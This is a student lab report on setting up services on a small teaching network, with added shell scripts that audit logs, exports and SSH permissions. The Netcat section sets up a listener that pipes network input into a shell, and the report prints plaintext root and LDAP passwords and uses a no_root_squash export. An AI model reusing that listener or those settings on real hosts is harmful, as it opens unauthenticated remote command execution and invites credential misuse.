
1. Secure Webmail: Sending mail using stunnel, mail submission port and https://

Objective

Stunnel is a proxy service used to add TLS (Transport Layer Security) encryption to an existing
server or client. Here, stunnel is configured to establish secure communication between the
servers. The other objective of this enhancement is to add a secure connection, i.e. https://, to
the webmail and to use the mail submission port.

List of configuration files

First, stunnel should be configured on all four machines.


To configure stunnel, we first set the execute bits on the rc.stunnel file, located at
/etc/rc.d/rc.stunnel.

We used Midnight Commander to set the execute permissions on rc.stunnel.


After the execute bits are set, we start the stunnel service:
"/etc/rc.d/rc.stunnel start"
Next we install the TinyNetCA certificate. Open a browser and enter the IP address of the
WebServer, then click the link on the page that says "Download TinyNet Root CA certificate";
the certificate is downloaded.
After downloading the certificate it is installed in the browser. We chose Chrome as our
browser. In Chrome the certificate is imported by navigating to
"3 dots – Settings – Advanced – Privacy & Security – Manage Certificates"
Browse to and select the TinyNetCA certificate file, and make sure to add it under Trusted Root
Certification Authorities.
After the certificate is installed, the browser history for the 192.168 site is cleared and the
browser is restarted to start a new cache session. We then access the SquirrelMail site with
http://192.168.56.202 and add https:// before the IP of the webserver. Finally we have a
secure connection with https://.
Screenshots

Figure 1 Listening Ports


Listening ports on all four machines. Here all the services with their respective port number
are listed.

Figure 2 Trusted Root CA store with TinyNetCA


This screen shows the Trusted Root CA store where TinyNetCA is also listed.
Figure 3 Squirrelmail with https://
1. Cross-System Multitail

Task Owner: Aaditya Jha (NP000290)

Objective of this enhancement

Multitail is an open source ncurses utility used to display multiple logfiles in the same window
of the same shell. Like the tail command it shows the last few lines of the logfiles in real time,
splitting a single console into several subwindows. It also supports colour highlighting and
adding, removing and filtering windows, among other features. (Saive, 2014)
This enhancement is made to:
i. View the postfix logfiles on Gateway and Mailserver in different windows using
multitail. The telnet service is used for sending mails and demonstrating the postfix
logfiles.
ii. View the postfix logfiles on Gateway and Mailserver in a single window with
different colors, using a different method from the above. Multitail is set up to
view the logfiles in the same window.

List of Configuration files and steps

The two methods we chose for this enhancement are SSH and Netcat. Using an SSH
connection between Gateway and Mailhost we monitored multiple postfix logfiles with multitail
in different subwindows. For the other method we used Netcat to view the postfix logfiles in the
same subwindow but in different colors.
For multitail with SSH:
We have already started the sshd service in our base system by setting the execute bits and running
/etc/rc.d/rc.sshd start. Also, we have configured the telnet file and run the xinetd service.
Now for the ssh configuration,
On both Gateway and mailhost we should edit the /etc/ssh/ssh_config file by adding:
"Host *
ControlPath /tmp/ssh-%r@%h:%p
ControlMaster auto
# ControlPersist 10m"
After adding the above lines to the ssh_config file on both Gateway and mailhost, we should
make an ssh connection between these two servers. To do that, on Gateway we enter the
following command:
"ssh root@mailhost.tinynet.edu"
After giving the password as "toor" the ssh connection is established.
Then we go to a new terminal window by pressing Alt + F2. In this terminal we run the multitail
command (the whole remote command, including tail, is quoted so that it runs over the existing ssh
connection):
"
multitail /var/log/postfix.log -l "ssh root@mailhost.tinynet.edu tail -f /var/log/postfix.log"
"
After this multitail command we send some test mails using SquirrelMail. After a successful mail
transfer the logfiles are displayed in two separate subwindows.
For Multitail with Netcat:
On Mailhost the following commands should be entered:
"mkfifo /tmp/foo
ln -s /bin/foo | bsdnc -lkv 23432 | /bin/rbash 1>/tmp/foo &"
After these commands we go to the Gateway to monitor the postfix logfiles:
"
multitail -ci yellow /var/log/postfix.log -ci red -L "echo 'tail /var/log/postfix.log' | nc 192.168.56.108 23432"
"
After this some test mails are sent and the output is shown in the same window with different colors
for both servers.

Screenshots
Figure 4 Editing file ssh_config
This window shows the file ssh_config under the /etc/ssh directory being edited. The last four lines
were added to this file.

Figure 5 SSH connection between Gateway and Mailhost


This window shows the ssh connection established between the Gateway and Mailhost servers.
Figure 6 Multitail before sending mail
This is the initial state of the postfix logfiles before sending mails. Here, the upper window is of the
gateway and the lower one is of the mailhost.

Figure 7 Mail sent using Telnet

Here, a test mail is sent from mailadmin@mail.tinynet.edu. This mail was successfully sent to the
mailhost server.
Figure 8 Multitail after mail sent
Here, the logfile is shown after a test mail was sent to the mailhost.

Figure 9 Netcat Commands


Here, the commands for setting up netcat are shown.
Figure 10 Multitail command
This is the command for multitail using netcat.

Figure 11 Initial state of Multitail Netcat

Here the postfix logfiles of both Gateway and Webserver are shown. The orange color is for the
Gateway and the red one is for the mailhost.
Figure 12 Final state of Multitail Netcat
This is the output of the multitail postfix logfiles by using netcat after sending the test mail using
telnet.

Obstacles encountered
None
2. LDAP – The missing piece of our enterprise network

Owner: Aaditya Jha (NP000290)

Objective

LDAP stands for "Lightweight Directory Access Protocol". It provides a single directory source for
system information look-up and authentication, and defines the methods by which directory data is
accessed. The objectives of configuring this enhancement are to:
i. Have two domains (o= and dc=) on the LDAP server
ii. Set up LDAP with SquirrelMail and Dovecot.
iii. Get LDAP to use stunnel.

List of configuration files

1. LDAP Setup with two domains


i. Open the "/etc/openldap/slapd.conf" file and edit it as follows:
"access to *
by dn="cn=LDAPAdmin,o=tinynet.edu" write
by self write
by * read"
Again under 'rootdn "cn=LDAPAdmin,dc=tinynet,dc=edu"', the same changes
are made.
ii. After this, the LDAP service should be enabled by making its rc file executable.
iii. The LDAP service is enabled by giving 755 permissions, using mc, to the file
/etc/rc.d/rc.ldap.
iv. After setting the permissions, rc.ldap should be restarted:
"/etc/rc.d/rc.ldap stop
/etc/rc.d/rc.ldap start"

v. Now "/etc/openldap/topClass.ldif" is edited as follows (the objectClass: simpleSecurityObject
and description lines are the ones added):

"dn: cn=LDAPAdmin,o=tinynet.edu
objectClass: organizationalRole
objectClass: simpleSecurityObject
cn: LDAPAdmin
description: LDAP Administrator
userPassword: {PLAIN}slapmesilly"
vi. Now, again restart the LDAP server:
"/etc/rc.d/rc.ldap stop"
"/etc/rc.d/rc.ldap start"
vii. Also run the command
'ldapadd -x -D "cn=LDAPAdmin,o=tinynet.edu" -w slapmesilly -f /etc/openldap/topclass.ldif'
The steps above create the first DIT, or top-level domain, of the LDAP service in "o="
format and tell the system to add the first DIT.
viii. Now we add some user data to the domain (first DIT) just created, with the following
command:
'ldapadd -x -D "cn=LDAPAdmin,o=tinynet.edu" -w slapmesilly -f /etc/openldap/userdata.ldif'
ix. Now we test LDAP search by executing the following command:
'ldapsearch -x -b "o=tinynet.edu" "(ou=UserNetB)" cn uid mail'
x. Now we have to create the second DIT (dc=tinynet,dc=edu), "dc=" is our domain.
In file /etc/openldap/topclass.ldif we make following changes:
"dn: dc=tinynet,dc=edu
objectClass: top
objectClass: dcObject
objectClass: organization
o: MyTinyNet
dc: tinynet
description: LDAP Root"
xi. Now, we move to the Webserver SquirrelMail configuration. To configure it,
go to /var/www/squirrelmail/config/config_svr_ldap.php,
copy and paste the example configuration block and edit it as follows:
"$ldap_server[0] = Array(
'host' => 'localhost',
'name' => 'ldap o=tinynet',
'base' => 'o=tinynet.edu'
);"
Now we need to change the PLA configuration so it is directed to localhost rather
than the LDAP server.
After this we kill the monkey process with htop and SIGTERM.
Now, we start the service using the command:
"/usr/sbin/monkey -D"
xii. Now, moving to the Mailserver for the dovecot configuration.
Go to the file /etc/dovecot/dovecot.conf.
Uncomment the passdb ldap and userdb ldap sections to get the following:
"
passdb ldap {
# Path for LDAP configuration file
args = /etc/dovecot/dovecot-ldap.conf
}

userdb ldap {
# Path for LDAP configuration file
args = /etc/dovecot/dovecot-ldap.conf
}
"
Now, we go to the file /etc/dovecot/dovecot-ldap.conf and edit the following lines:
"
hosts = localhost
pass_filter = (mail=%n@%d)
user_filter = (mail=%n@%d)
"
Now we should restart the dovecot service so the new configuration takes effect:
"/etc/rc.d/rc.dovecot stop"
"/etc/rc.d/rc.dovecot start"
Connect to SquirrelMail and try the address book as follows:
Compose – Addresses button – List All button
Similarly, the second DIT also requires the same configuration in the LDIF, dovecot and
SquirrelMail.

Screenshots
Figure 13 Removing ldaps:/// from rc.ldap
Figure 14 rc.ldap before removing ldaps:///

Figure 15 Changing ownership to nobody

Figure 16 slapd.conf before editing

Figure 17 Adding new entries


Figure 18 Before editing topclass.ldif

Figure 19 topclass.ldif after editing

Figure 20 Checking list on LDAP


3. SUDO
Owner: Aaditya Jha (NP000290)
Objective

Sudo is a feature or program in Linux operating systems that provides administrative
privileges to normal users. Sudo stands for "Superuser do", which means the tasks and
permissions that the superuser is capable of.
The main objectives of this enhancement are to:
i. Show a random fortune in color on every login for different users on the startup
display.
ii. Force the normal users to use sudo. No root access is to be allowed.
iii. Show different prompts of colors for different types of users that is, root users have
different color and normal users have different color.

List of configuration files

i. Random Fortune after every login


To display a random fortune after every login rather than the command summary, we first
install the Ascii Art package from SetupMenu under the /mnt/hdc directory. After that we edit
the file /etc/profile.d/slax.sh by adding the following commands:
"
# save the fortune to a variable
FF=$(fortune)

# show it in green inside a box, then reset the terminal colour
echo -e "\e[01;32m"; echo "$FF" | boxes; echo -e "\e[00m"
"
The above changes display a random fortune in green every time a user logs in.
After this we should clear the /etc/issue file.
ii. For Sudo
To demonstrate the use of sudo we create multiple user accounts. On the Mailhost
server we created three users with the command "adduser" and entered the
following details:
"Username: aaditya; password: aadi2000
Username: manisha; password: manisha123
Username: Pranesh; password: pranesh123"

After the "adduser" command we have three normal user accounts on Mailhost.
After the creation of the three users we edit the sudoers file, /etc/sudoers.
- To force the users to use the sudo command we edit the /etc/sudoers file as
follows:
"# User privilege specification
root ALL=(ALL) ALL
aaditya ALL=(ALL) ALL
manisha ALL=(ALL) ALL
Pranesh ALL=(ALL) /usr/sbin/monkey -D"
- We have configured the user "Pranesh" to have access only to /usr/sbin/monkey -D, to
have a difference from the other users, which makes the demonstration easier.
By the above step every user is now forced to use sudo.
iii. Color Prompts for each user type
To have different color prompts for different user types we edit the /etc/profile
file as follows:
"# Set a default shell prompt
…..
else
if [ $(id -u) -ne 0 ]; then
# non-root user
PS1='[\[\033[01;32m\]\u@\h \[\033[01;34m\]\W\[\033[00m\]]$ '
else
# root user
PS1='[\[\033[01;31m\]\u@\h \[\033[01;34m\]\W\[\033[00m\]]# '
fi
fi"
The above code says that if the user ID is not equal to 0 the system uses green
(01;32m), otherwise, for the root user, the system uses red (01;31m) for the
prompt.
With the above enhancements, the Mailhost system does not allow root access, and
normal users must use sudo for administrative actions. The system shows a random
fortune in color every time a user logs in. Also, each type of user has a different color
prompt: root users have red and normal users have green prompts.

Screenshots of tests

Figure 21 Installing Ascii Art


Here we have installed the Ascii Art package.
Figure 22 Editing file slax.sh
This screenshot shows the editing of the file slax.sh, which is inside the /etc/profile.d directory.

Figure 23 Random fortune after root login


This screenshot shows the random fortune when we login as root.

Figure 24 Random fortune after next login


For next time we login the fortune changes.
Figure 25 Editing file /etc/sudoers
Editing sudoers to force all users to use sudo.

Figure 26 Root account locked


Here, root access is locked. So, root login displays this error.
Figure 27 Adding new user aaditya
Creation of the user aaditya with useradd. Similarly the other two users, manisha and
Pranesh, have been created.

Figure 28 Permission denied for changing directory


User "Aaditya" tries to access the /etc/dovecot/mail-pwd file but is denied access.
Figure 29 Sudo worked for unlocking root account
Sudo worked for unlocking root account.

Figure 30 Editing file profile


Editing /etc/profile for making different color prompts for different user types.
Figure 31 Color prompt for user aaditya
This window displays the color prompt for user aaditya.

Figure 32 Color prompt for root login


This window displays the color prompt for root login.

4. OpenVPN
Owner:
Objective
OpenVPN is open-source software, also used commercially, that implements virtual
private network techniques for creating secure point-to-point connections. The objective of this
enhancement is to set up OpenVPN using static keys, making two setup files, one for tun and
one for tap.

List of configuration file


First, we install the OpenVPN package from SetupMenu under the directory
/mnt/hdc. After the installation, on the server side we copy dh1024.pem, server.crt, server.key
and tmp-ca.crt from /usr/share/doc/openvpn-2.0.9/sample-keys to the directory
/etc/openvpn/keys. Then, from the directory /usr/share/doc/openvpn-2.0.9/sample-config-files,
we copy the server.conf file to /etc/openvpn.

Now we should edit the server.conf and client.conf files to reflect the PKI generated which
are ca, cert, key and dh parameters. In the server.conf file make configurations as follows.
"
ca /etc/openvpn/keys/tmp-ca.crt
cert /etc/openvpn/keys/server.crt
key /etc/openvpn/keys/server.key
"
For the dh,
"dh /etc/openvpn/keys/dh1024.pem"

For Tun and Tap Configuration,


Running the command
"modprobe tun"
loads the Tun/Tap driver. To test the Tun/Tap device, type:
"cat /dev/net/tun"
To test whether the OpenVPN service is operating, type:
"openvpn server.conf"
To establish a secure handshake, we must have the same Certificate Authority (CA)
certificate, generated with OpenVPN's easy-rsa, on both the client and the server side. To
generate the certificates the following commands are required on both client and server:
"cd /usr/doc/openvpn-2.0.9/easy-rsa"
". ./vars"
"./clean-all"
"./build-ca"
Now we run the following in the directory /usr/doc/openvpn-2.0.9/easy-rsa/:
i. "./build-key-server server"
ii. Enter the Common Name field as "server" and confirm the certificate with 'y'.
iii. "./build-dh", then check in mc that dh1024.pem exists.
iv. Now copy the newly generated keys from the /keys directory to
/usr/doc/openvpn-2.0.9/sample-config-files/ in mc.
Configuring the client
The client should make the same configuration as above and add the following:
i. Copy the newly generated Certificate Authority (CA) files, i.e. ca.key and ca.crt, to
/keys on the client.
ii. Change directory to /usr/doc/openvpn-2.0.9/easy-rsa/ and run
"./build-key client"
iii. Enter the 'Common Name' field as "client" and confirm the certificate with 'y'.
iv. Now copy all the newly generated client keys and certificates from the /keys
directory to /usr/doc/openvpn-2.0.9/sample-config-files/ in mc.
Configuring Tun files for server and client
Now edit ./server.conf under the directory /usr/doc/openvpn-2.0.9/sample-config-files/
as follows:
"
;dev tap
dev tun
"
Now check whether ca.crt, server.crt, server.key and dh1024.pem are properly
defined, and add:
• ;server-bridge 192.168.8.8 255.255.255.0 192.168.8.128 192.168.8.254
• server 10.8.0.0 255.255.255.0

Now edit ./client.conf for the client as follows:

"
;server
;client
;dev tap
dev tun
remote 192.168.76.101 1194
;remote my-server-2 1194
"
Check that ca.crt, client.crt and client.key are properly defined.
Now starting the testing for Tun
On both server and client create and start the tun device by entering the following commands:
"
mkdir /dev/net
mknod /dev/net/tun c 10 200
"
Now enter the following commands:
"
cd /usr/doc/openvpn-2.0.9/sample-config-files/
openvpn tun-server.conf
"
For Tap, on both the client and server side enter the following commands:
"
cd /usr/doc/openvpn-2.0.9/sample-config-files/
openvpn tap-server.conf
"

Screenshots
Figure 33 Basic Commands after openvpn installations

Figure 34 Configurations of servers

Figure 35 Adding attributes to vpn services

Figure 36 Commitment of certification

5. Iptables

Task Owner: Aaditya Jha (NP000290)

Objective

iptables is an administrative tool that a network administrator uses for IPv4 packet filtering
and NAT. Here, the objective of this enhancement is to add six iptables rules that match
malformed TCP flag combinations, so that the network does not process them in the TCP
stack. The other objective is to show all six rules being triggered, using hping2 and multitail.

Configurations made

First we add the six rules, with the following commands. Each rule matches one invalid TCP flag
combination and logs it at alert level with a distinct prefix:
Rule 1: iptables -A INPUT -p tcp --tcp-flags ALL NONE -j LOG --log-level alert --log-prefix "iptables ALL NONE"
Rule 2: iptables -A INPUT -p tcp --tcp-flags FIN,SYN FIN,SYN -j LOG --log-level alert --log-prefix "iptables FIN,SYN FIN,SYN"
Rule 3: iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-level alert --log-prefix "iptables SYN,RST SYN,RST"
Rule 4: iptables -A INPUT -p tcp --tcp-flags FIN,RST FIN,RST -j LOG --log-level alert --log-prefix "iptables FIN,RST FIN,RST "
Rule 5: iptables -A INPUT -p tcp --tcp-flags FIN,ACK FIN -j LOG --log-level alert --log-prefix "iptables FIN,ACK FIN"
Rule 6: iptables -A INPUT -p tcp --tcp-flags ACK,URG URG -j LOG --log-level alert --log-prefix "iptables ACK,URG URG"

Now, to see all the iptables rules added above we use
"iptables -L"
As stated in the question, we must show the iptables rules being triggered using hping2 and multitail.
So we enter the following commands to display the rules using hping2 and multitail:
Rule 1: multitail /var/log/syslog -l "hping2 192.168.56.101"
Rule 2: multitail /var/log/syslog -l "hping2 -F -S 192.168.56.101"
Rule 3: multitail /var/log/syslog -l "hping2 -S -R 192.168.56.101"
Rule 4: multitail /var/log/syslog -l "hping2 -F -R 192.168.56.101"
Rule 5: multitail /var/log/syslog -l "hping2 -F 192.168.56.101"
Rule 6: multitail /var/log/syslog -l "hping2 -U 192.168.56.101"
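As an added example (not part of this lab report), the following POSIX shell script summarises the syslog lines that the six LOG rules above write: it counts hits per --log-prefix and finds the source address that triggered the most rules. The sample syslog lines are constructed to match the lab's prefixes, not captured from the lab machines, and the exact kernel line layout on the lab VM may differ slightly.

```shell
#!/bin/sh
# Summarise the syslog lines written by the six iptables LOG rules above.
# Added example for this report, not part of the lab. The LOG target writes
# "kernel: <log-prefix>IN=... SRC=... DST=... PROTO=TCP ... <flags>" to syslog;
# the sample below is constructed in that shape (with a space before IN= for
# readability) and is not real captured traffic.
SAMPLE_LOG='Mar  1 10:00:01 gateway kernel: iptables ALL NONE IN=eth0 OUT= SRC=192.168.56.101 DST=192.168.56.102 PROTO=TCP SPT=1024 DPT=80
Mar  1 10:00:02 gateway kernel: iptables FIN,SYN FIN,SYN IN=eth0 OUT= SRC=192.168.56.101 DST=192.168.56.102 PROTO=TCP SPT=1025 DPT=80 FIN SYN
Mar  1 10:00:03 gateway kernel: iptables FIN,SYN FIN,SYN IN=eth0 OUT= SRC=192.168.56.101 DST=192.168.56.102 PROTO=TCP SPT=1026 DPT=80 FIN SYN
Mar  1 10:00:04 gateway kernel: iptables SYN,RST SYN,RST IN=eth0 OUT= SRC=192.168.56.108 DST=192.168.56.102 PROTO=TCP SPT=2000 DPT=25 SYN RST
Mar  1 10:00:05 gateway kernel: iptables ACK,URG URG IN=eth0 OUT= SRC=192.168.56.108 DST=192.168.56.102 PROTO=TCP SPT=2001 DPT=25 URG
Mar  1 10:00:06 gateway postfix/smtpd[1234]: connect from mailhost.tinynet.edu[192.168.56.108]'

extract_prefix() {
    # stdin: syslog lines; stdout: the --log-prefix of every iptables LOG line.
    awk '/kernel:.*IN=/ {
        line = $0
        sub(/^.*kernel: /, "", line)            # drop timestamp, host and "kernel:"
        sub(/^\[ *[0-9.]+\] */, "", line)        # drop a printk timestamp if present
        sub(/ *IN=.*$/, "", line)                # the prefix is everything before IN=
        if (line ~ /^iptables /) print line
    }'
}

extract_source() {
    # stdin: syslog lines; stdout: SRC address of every iptables LOG line.
    awk '/kernel:.*iptables .*IN=/ {
        if (match($0, /SRC=[0-9.]+/)) print substr($0, RSTART + 4, RLENGTH - 4)
    }'
}

count_prefix() {
    # Number of sample lines logged by the rule whose --log-prefix is "$1".
    printf '%s\n' "$SAMPLE_LOG" | extract_prefix | grep -cxF -- "$1" || true
}

top_source() {
    # Source address that triggered the most rules in the sample.
    printf '%s\n' "$SAMPLE_LOG" | extract_source | sort | uniq -c | sort -rn |
        awk 'NR == 1 { print $2 }'
}

report() {
    echo "hits per rule prefix:"
    printf '%s\n' "$SAMPLE_LOG" | extract_prefix | sort | uniq -c | sort -rn
    echo "hits per source address:"
    printf '%s\n' "$SAMPLE_LOG" | extract_source | sort | uniq -c | sort -rn
}

report
```

Pipe the real file instead of the sample (for example `extract_prefix < /var/log/syslog`) to get the same summary for the lab machine.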
Figure 46 Adding rules of iptables
In this screen we have added all six rules for filtering the TCP stack.

Figure 47 List of newly added rules


This screen shows the list of added iptable rules.
The following six screens show the iptables rules being triggered, using hping2 and multitail. Each
figure represents one rule.
Figure 48 Displaying rule 1

Figure 49 Displaying rule 2


Figure 50 Displaying rule 3

Figure 51 Displaying rule 4

Figure 52 Displaying rule 5


Figure 53 Rule 6
Screenshots of tests, with explanation
6. Virtual Servers
a) Set up two normal users, and add directories under their home directories for their web
pages and CGI scripts
b) In monkey.conf set up two virtual servers (VirtualHost) for them, and disallow serving
web pages from user home directories
c) Configure the system so users cannot access the VirtualDocumentRoot directories, add
cnames, and set up a cron job to automatically move files from home directories to the
proper VirtualDocumentRoot

Owner:

Objective – what this does for the system

Two directories, htdocs and cgi-scripts, are created for two non-root users, each in their
home directory, and virtual hosts are defined in the monkey.conf file that set the root directory
storing the web files for each user.
A CNAME defines an alias in the webserver's DNS so that the whole hostname need not be used.
Similarly, crontab checks, edits and views the commands that the cron daemon needs to
execute repeatedly.

List the relevant configuration files, and for each one briefly describe what was done

1. monkey.conf in /etc/monkey/monkey.conf
The file monkey.conf sets up two users for web files and cgi-scripts; the users (i.e. harry and
aadhitya) were added to the file as shown here:

2. Cnames in /etc/dnsmasq.d/cnames on the Gateway server
A CNAME maps an alias of one domain name to another in DNS. Two other CNAMEs were specified
along with the hostname bananas.tinynet.edu (monkey) that was added.

3. /var/spool/cron/crontabs/root
Crontab runs a list of commands at a 10 minute interval; files are moved from the user home
directory to the Virtual Document Directory. Four crontab entries were added to the file
/var/spool/cron/crontabs/root.
 
Screenshots of tests, with explanations

The virtual server setup followed these steps:

1. Creating default home directories for two non-root users
useradd -m harry
useradd -m aadhitya

2. Creating two directories, htdocs and cgi-scripts, in their respective home directories
cd /home/harry
mkdir htdocs cgi-scripts
cd /home/aadhitya
mkdir htdocs cgi-scripts

3. Adding two virtual hosts in the file monkey.conf

4. Permissions were changed on each user's home directory using mc: press F9, then
File > ChMod, and remove the read/execute permissions for owner, group and others.

Fig: - permission change for harry directory

Fig: - permission change for aadhitya directory

Obstacles encountered, obstacles overcome

Running commands using crontab and making the two directories for each of the two non-root users
was difficult; this was sorted out using internet resources.

Any Outstanding/Unresolved Issues

None
7. NFS
a) Put the webserver VirtualHost DocumentRoot directories (from above) on a new VM
which will be the server for NFS mount
b) Set up the VirtualHost users on the NFS server, create directories under their home
directory for their website files, and allow them to put files in using ssh
c) Run the cron jobs on the NFS server

Owner:

Objective – what this does for the system

- NFS puts the webserver directories on a new VM, which behaves as the server.
- Directories are created under the home directories on the NFS server, users are allowed to put
files in them using ssh, and the cron jobs are run on the NFS server.

List the relevant configuration files, and for each one briefly describe what was done

1. /etc/monkey/monkey.conf

This file was already set up for the virtual server and was configured on the NFS server.
Fig: - virtual hosts for harry and aadhitya

2. /etc/exports

This file describes which directories the NFS server exports; the following line was
added to the file (the option list must not contain spaces):
/var/monkey/htdocs *.tinynet.edu(ro,sync,no_subtree_check,no_root_squash)
Fig: - /etc/exports file in webserver
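Added here as an example, not the lab's own configuration: a POSIX shell audit of /etc/exports entries that flags the two settings in the line above which a reviewer would question, no_root_squash and a wildcard or world-open client list. The exports file it reads is constructed inline; its first line is the one used in this report.

```shell
#!/bin/sh
# Audit /etc/exports entries for risky settings. Added example, not from the lab.
# Line format: <path> <client>(<opt>,<opt>,...) [<client>(...)] ...

# Constructed sample; the first line is the export used in this report.
SAMPLE_EXPORTS='/var/monkey/htdocs *.tinynet.edu(ro,sync,no_subtree_check,no_root_squash)
/home *(rw,sync)
/srv/backup 192.168.56.0/24(rw,sync,no_subtree_check)
# comment lines and blank lines are ignored

/srv/pub *.tinynet.edu(ro,sync,no_subtree_check)'

audit_exports() {
    # stdin: exports file; stdout: "<path> <client> <finding>" per risk found.
    awk '
        /^[ \t]*#/ { next }          # comment
        NF == 0    { next }          # blank line
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                # split "client(opt,opt)" into the client spec and its option list
                if (match(client, /\(.*\)$/)) {
                    opts = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                n = split(opts, o, ",")
                rw = 0; nrs = 0
                for (j = 1; j <= n; j++) {
                    if (o[j] == "rw") rw = 1
                    if (o[j] == "no_root_squash") nrs = 1
                }
                if (nrs) print path, client, "no_root_squash: client root keeps uid 0 on this export"
                if (client == "*") print path, client, "world-open client list"
                else if (client ~ /^\*/) print path, client, "wildcard client list"
                if (rw && client ~ /^\*/) print path, client, "rw to a wildcard client"
            }
        }'
}

finding_count() {
    # Total number of findings for the sample file.
    printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports | wc -l | tr -d ' '
}

findings_for() {
    # Number of findings for the export path "$1" in the sample file.
    printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports | grep -c "^$1 " || true
}

printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
```

Run `audit_exports < /etc/exports` on the NFS server to check the live file.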

Steps to create NFS

1) The TinyNetConfig.iso file was mounted on a new base system and configured using the
no role option.
Fig: - configuring NFS as no role

Fig: - unique simple host name


2) Execute permissions were set for owner, group and others on the two files
/etc/rc.d/rc.rpc and /etc/rc.d/rc.nfsd.

Fig: - execute permissions for rc.rpc in NFS

Fig: - execute permissions for rc.nfsd in NFS


Above permissions are also set on to webserver.

Fig: - execute permissions for rc.rpc in webserver


Fig: - execute permissions for rc.nfsd in webserver

3) rc.rpc and rc.nfsd were successfully started on both NFS and webserver.

/etc/rc.d/rc.rpc start

/etc/rc.d/rc.nfsd start
Fig: - restarting the service on NFS

4) The mounted share can be checked from the webserver using the command:

showmount -e 192.168.56.106

5) The shared folder of the NFS server is mounted on the home directory of the
webserver:

mount 192.168.56.106:/var/monkey/htdocs /home/

6) The /var/tmp directory was used to transfer files on the NFS server.


7) New users harry and aadhitya were created:

useradd -m harry

useradd -m aadhitya
8) Setting the virtual hosts in the monkey.conf file

<Virtualhost>
VirtualServerName harry.tinynet.edu
VirtualDocumentRoot /var/monkey/htdocs/harry
VirtualScriptAlias /cgi-bin/ /var/monkey/htdocs/harry/cgi-scripts/
VirtuaForceGetDir off
</Virtualhost>

<Virtualhost>
VirtualServerName aadhitya.tinynet.edu
VirtualDocumentRoot /var/monkey/htdocs/aadhitya
VirtualScriptAlias /cgi-bin/ /var/monkey/htdocs/aadhitya/cgi-scripts/
VirtuaForceGetDir off
</Virtualhost>

9) Edit the /etc/ssh/sshd_config file and restart the ssh service:

/etc/rc.d/rc.sshd stop

/etc/rc.d/rc.sshd start

10) Set up cron jobs to move files from /var/tmp/ to the user directories:

*/10 * * * * mv -f /var/tmp/* /home/sulabh/htdocs

*/10 * * * * mv -f /var/tmp/* /home/rajesh/htdocs


Screenshots of tests, with explanations

1. "/etc/exports file for webserver"

2. "start rc.rpc and rc.nfsd service."
Obstacles encountered, obstacles overcome

“The NFS was unable to mount the /var/monkey/htdocs folder.”

Any Outstanding/Unresolved Issues

None
8. SSH Key Management

Owner:

Objective

List of configuration files

To set up key-based authentication with the ssh agent, the following configuration is made:
i. Creating a key pair for the server on the local host
We can generate an SSH key pair by executing the ssh-keygen command. The keys are stored
by default inside the $HOME/.ssh/ directory and are named according to the key type
used. When we are asked for the location, we can give a directory name that identifies the
remote host, which keeps the keys organized.
ii. Copying the public key to the remote server
To copy the public key to the remote server we run the following command:
"scp ~/.ssh/id_rsa.pub username@remote-server.org:"
We must enter the password for our remote user account when asked.
iii. Installing the public key on the remote server
To install the public key on the remote server, we log in and create a .ssh directory under
our home directory. After the directory is created we append our public key to the list of
authorized_keys with the following command:
"cat ~/id_rsa.pub >> ~/.ssh/authorized_keys"
After appending the public key, id_rsa.pub is deleted from the home directory. Now we
check whether the proper permissions are set on all relevant files. The permissions are as
follows:
For the local system
"chmod 700 ~/"
"chmod 700 ~/.ssh"
"chmod 600 ~/.ssh/id_rsa"
For the remote system
"chmod 700 ~/"
"chmod 700 ~/.ssh"
"chmod 600 ~/.ssh/authorized_keys"
iv. Adding the passphrase-protected private key on the local host to the ssh-agent
An ssh-agent is a program that caches our decrypted private keys and sends them to the SSH
client. We provide our passphrase only once, while adding our private key to the agent's
cache. To add our private key we use the following command:
"ssh-add ~/.ssh/id_rsa"
and then enter the passphrase when asked. After the private key is added we can make SSH
connections without entering the passphrase.
v. Configuring the user startup file to execute ssh-agent automatically after every boot
This is done by adding the following lines to ~/.bashrc:
"
# start an agent for this user if none is running, saving its environment to a file
if ! pgrep -u "$USER" ssh-agent >/dev/null; then
ssh-agent > ~/.ssh-agent-values
fi
# import the saved agent variables into this shell if they are not set yet
if [ "$SSH_AGENT_PID" == "" ]; then
eval "$(<~/.ssh-agent-values)"
fi
"
Now, placing "AddKeysToAgent yes" in the Host section of the file /etc/ssh/ssh_config
makes ssh clients store all keys in the agent on first use.
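As an added example (not from the report), the following POSIX shell script checks the permission list above on a home directory, reporting anything that differs from 700 on the home and .ssh directories and 600 on id_rsa and authorized_keys. The demo at the end builds a temporary home with deliberately loose modes so the script runs offline; the paths are the section's own.

```shell
#!/bin/sh
# Check the permissions this section requires on a home directory and report deviations.
# Added example for this report; the checked paths follow the section (~/.ssh, id_rsa,
# authorized_keys).

mode_of() {
    # 9-character symbolic mode (e.g. rwx------) taken from ls, which is portable
    # across GNU and BSD userlands where the stat(1) flags differ.
    ls -ld -- "$1" | cut -c2-10
}

check_one() {
    # check_one <path> <expected mode>; prints a finding and returns 1 on a mismatch.
    if [ ! -e "$1" ]; then
        printf 'MISSING %s\n' "$1"
        return 1
    fi
    actual=$(mode_of "$1")
    if [ "$actual" != "$2" ]; then
        printf 'BAD %s is %s, expected %s\n' "$1" "$actual" "$2"
        return 1
    fi
    return 0
}

audit_ssh_perms() {
    # audit_ssh_perms <home dir>; prints findings and returns the number of findings.
    home=$1
    bad=0
    check_one "$home"      rwx------ || bad=$((bad + 1))
    check_one "$home/.ssh" rwx------ || bad=$((bad + 1))
    for f in id_rsa authorized_keys; do
        # Only files that exist are checked: a pure client has no authorized_keys,
        # a pure server no id_rsa.
        if [ -e "$home/.ssh/$f" ]; then
            check_one "$home/.ssh/$f" rw------- || bad=$((bad + 1))
        fi
    done
    return "$bad"
}

audit_count() {
    # Prints the number of findings for <home dir>; 0 means the layout matches.
    n=0
    audit_ssh_perms "$1" >/dev/null || n=$?
    echo "$n"
}

demo() {
    # Constructed home directory with two deliberately loose modes (home 755, key 644).
    d=$(mktemp -d) || return 1
    mkdir "$d/.ssh"
    printf 'constructed private key placeholder\n' > "$d/.ssh/id_rsa"
    printf 'constructed public key placeholder\n' > "$d/.ssh/authorized_keys"
    chmod 755 "$d"; chmod 700 "$d/.ssh"
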